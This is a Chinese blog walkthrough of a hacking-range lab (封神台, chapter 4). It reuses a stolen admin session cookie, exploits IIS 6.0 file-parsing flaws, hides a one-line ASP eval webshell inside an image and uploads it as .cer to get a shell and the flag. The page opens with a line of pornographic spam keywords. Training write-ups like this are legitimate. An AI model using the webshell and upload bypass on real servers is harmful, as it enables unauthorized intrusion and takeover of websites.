国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁
  2. >Toy博客

封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)

2年前作者:小孔吃不胖分類:Toy博客閱讀(19)違法舉報

這篇具有很好參考價值的文章主要介紹了封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

封神臺 https://hack.zkaq.cn

封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)一、1.通過修改Cookie登錄后臺(沒用重打)

????????2,上傳SHELL!3,F(xiàn)lag在網(wǎng)站根目錄(flag.php)

????????3.上傳圖片時建議上傳小文件,建議用QQ表情
????????尤里通過XSS終于得到了管理員Cookie,在修改了cookie后尤里直接繞過了登錄密碼,
????????看到了后臺功能!然后要做的,就是找一個上傳點,上傳自己的外殼了!

一.開始?

封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)

?這是用上一章XSS的cookie???? 用bp抓包也可以

封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)

ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC

?復(fù)制粘貼即可封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)

?點擊準(zhǔn)備好了嗎或者f5刷新進(jìn)入網(wǎng)頁

封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)

二、分析Microsoft-IIS/6.0

可能存在IIS解析漏洞:

??? 1.目錄解析 以*.asp命名的文件夾里的文件都將會被當(dāng)成ASP文件執(zhí)行。
??? 2.文件解析 對于 *.asp;.jpg 像這種畸形文件名在";"后面的直接被忽略,也就是說當(dāng)成 *.asp文件執(zhí)行。
??? 3.IIS6.0 默認(rèn)的可執(zhí)行文件除了asp還包含這三種 *.asa *.cer *.cdx。

1.查看上傳目錄 和上傳文件限制

?系統(tǒng)管理 網(wǎng)站配置封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)

?封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)

2.確定上傳點

添加下載程序和添加產(chǎn)品都可

封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)

?三、生成木馬、上傳木馬

注意

封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)

流程:? 圖片 ----生成、植入木馬---木馬圖片---以.cer上傳----蟻劍----找到目錄flag

?封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)

1.找一張空間較小的圖片

封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)

2. 以萬能的txt記事本打開

發(fā)現(xiàn)是亂碼 正常

封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)

3.寫個txt 改后綴名為php(網(wǎng)頁)

????????mm.txt里面寫一句話木馬?

????????簡單的? eval: 執(zhí)行??? request:從用戶那里取得的信息?? 木馬:執(zhí)行從用戶那里取得的信息

<%eval request ("a")%>

4. 復(fù)制生成帶有木馬的圖片

copy 1.jpg/b+mm.php 2.jpg
#復(fù)制 原圖片/b+木馬.php #新圖片

封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)

?封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)

4.用記事本查看木馬圖片

末尾發(fā)現(xiàn)一句話木馬代表成功生成

封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)

5.改文件后綴名2.jpg改為2.cer 上傳

封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)

?封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)

?復(fù)制到url 封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)

6. 在蟻劍添加這個網(wǎng)址

封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)

?直接打開FLAG!.txt

封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)

?拿到flag? zkz{G3t_the_admin!Sh3ll}文章來源地址http://www.zghlxwxcb.cn/news/detail-470089.html

到了這里,關(guān)于封神臺 第四章:進(jìn)擊!拿到Web最高權(quán)限(繞過防護(hù)上傳木馬)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 小黑子—spring:第四章 事務(wù)控制與整合web環(huán)境

    小黑子—spring:第四章 事務(wù)控制與整合web環(huán)境

    事務(wù)是開發(fā)中必不可少的東西,使用JDBC開發(fā)時,我們使用connnection對事務(wù)進(jìn)行控制,使用MyBatis時,我們使用SqlSession對事務(wù)進(jìn)行控制,缺點顯而易見,當(dāng)我們切換數(shù)據(jù)庫訪問技術(shù)時,事務(wù)控制的方式總會變化,Spring 就將這些技術(shù)基礎(chǔ)上,提供了統(tǒng)一的控制事務(wù)的接口。Spring的

    2024年02月06日
    瀏覽(24)
  • 第四章 單例模式

    第四章 單例模式

    代碼示例 優(yōu)缺點:可能會造成內(nèi)存的浪費(fèi),但也只能浪費(fèi)內(nèi)存 代碼示例 代碼示例 缺點:多線程不安全 缺點效率太低 在類加載時,靜態(tài)內(nèi)部類沒有調(diào)用是不會進(jìn)行類加載的,當(dāng)被調(diào)用時才會被加載,而且只加載一次,加載時線程安全 優(yōu)缺點

    2023年04月21日
    瀏覽(35)

  • 第四章,登錄注冊

    目錄 4.1 添加注冊頁面 4.2 注冊表單驗證 4.3提交注冊信息 4.4 完善注冊功能

    2024年02月12日
    瀏覽(28)
  • 第四章 RPC 調(diào)用

    第四章 RPC 調(diào)用

    通過以上案例我們發(fā)現(xiàn),Http請求調(diào)用服務(wù)實例屬實過于麻煩。其實對于請求同一個服務(wù),很多步驟都是相同的,例如:服務(wù)名,地址,httpClient 創(chuàng)建步驟等。 RPC的出現(xiàn),就是為了解決這一問題。 RPC: 即我們常說的遠(yuǎn)程過程調(diào)用,就是像調(diào)用本地方法一樣調(diào)用遠(yuǎn)程方法,通信協(xié)

    2024年02月04日
    瀏覽(25)

  • 第四章 搜索功能

    指定返回的字段 在ES中,通過_source子句可以設(shè)定返回結(jié)果的字段。_source指向一個JSON數(shù)組,數(shù)組中的元素是希望返回的字段名稱。 例如,通過source指定查詢字段 結(jié)果計數(shù) 給前端傳遞搜索匹配結(jié)果的文檔條數(shù),即需要對搜索結(jié)果進(jìn)行計數(shù)。ES提供了_count API功能,在該API中,用

    2023年04月08日
    瀏覽(35)
  • 第四章——數(shù)學(xué)知識1

    第四章——數(shù)學(xué)知識1

    質(zhì)數(shù):在大于1的整數(shù)中,如果只包含1和本身這倆個約束,就被叫質(zhì)數(shù)或素數(shù)。 質(zhì)數(shù)的判定——試除法:如果d能整除n,則n/d再除n,結(jié)果是一個整數(shù)。 d≤n/d。 質(zhì)因數(shù):一個正整數(shù)的倆個因數(shù)都是質(zhì)數(shù) 分解質(zhì)因數(shù)——試除法: 從小到大枚舉所有的質(zhì)因數(shù),這里我們要的是質(zhì)

    2023年04月26日
    瀏覽(28)
  • 第四章 Text

    第四章 Text

    在本章中,您將學(xué)習(xí)如何在頁面上繪制文本。 繪圖文本是 PDF 圖形中最復(fù)雜的部分,但它也是幫助 PDF 擊敗競爭對手成為當(dāng)今國際標(biāo)準(zhǔn)的原因。 當(dāng)其他原始播放器將文本轉(zhuǎn)換為光柵圖像或矢量路徑(以保持視覺完整性)時,PDF 的發(fā)明者知道用戶需要可以搜索和復(fù)制的文本,而

    2024年02月06日
    瀏覽(33)
  • 計網(wǎng):第四章 網(wǎng)絡(luò)層

    計網(wǎng):第四章 網(wǎng)絡(luò)層

    基于湖科大教書匠b站計算機(jī)網(wǎng)絡(luò)教學(xué)視頻以及本校課程老師ppt 整合出的計算機(jī)網(wǎng)絡(luò)學(xué)習(xí)筆記 根據(jù)文章目錄,具體內(nèi)容都在附贈的pdf文件中,適合日常學(xué)習(xí)、考前沖刺 一下是第四章筆記中大概的知識點內(nèi)容,歡迎查漏補(bǔ)缺^^ 可以在電腦網(wǎng)頁端進(jìn)行下載哦~ 目錄 1.網(wǎng)絡(luò)層概述

    2024年01月24日
    瀏覽(33)
  • linux第四章(網(wǎng)絡(luò))

    linux第四章(網(wǎng)絡(luò))

    在配置前首先查看本機(jī)的ensXX信息:cat ens160.nmconnection 看本機(jī)配置:cd /etc/NetworkManager/ ? ? ? ? ? ? ? ? ? ? ? cd? system-connextions/? ? ls 一。接口管理命令:ip命令/nmcli命令/nmtui命令 1.對IP地址進(jìn)行操作: ip的命令: IP link:顯示網(wǎng)絡(luò)設(shè)備的運(yùn)行狀態(tài) ip -s show ens160:查看設(shè)備(en

    2024年01月19日
    瀏覽(21)
  • 第四章網(wǎng)關(guān)

    第四章網(wǎng)關(guān)

    Spring Cloud Gateway 是 Spring Cloud 的一個全新項目,該項目是基于 Spring 5.0,Spring Boot 2.0 和 Project Reactor 等響應(yīng)式編程和事件流技術(shù)開發(fā)的網(wǎng)關(guān),它旨在為微服務(wù)架構(gòu)提供一種簡單有效的統(tǒng)一的 API 路由管理方式。 Gateway網(wǎng)關(guān)是我們服務(wù)的守門神,所有微服務(wù)的統(tǒng)一入口。 網(wǎng)關(guān)的核

    2024年02月10日
    瀏覽(24)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包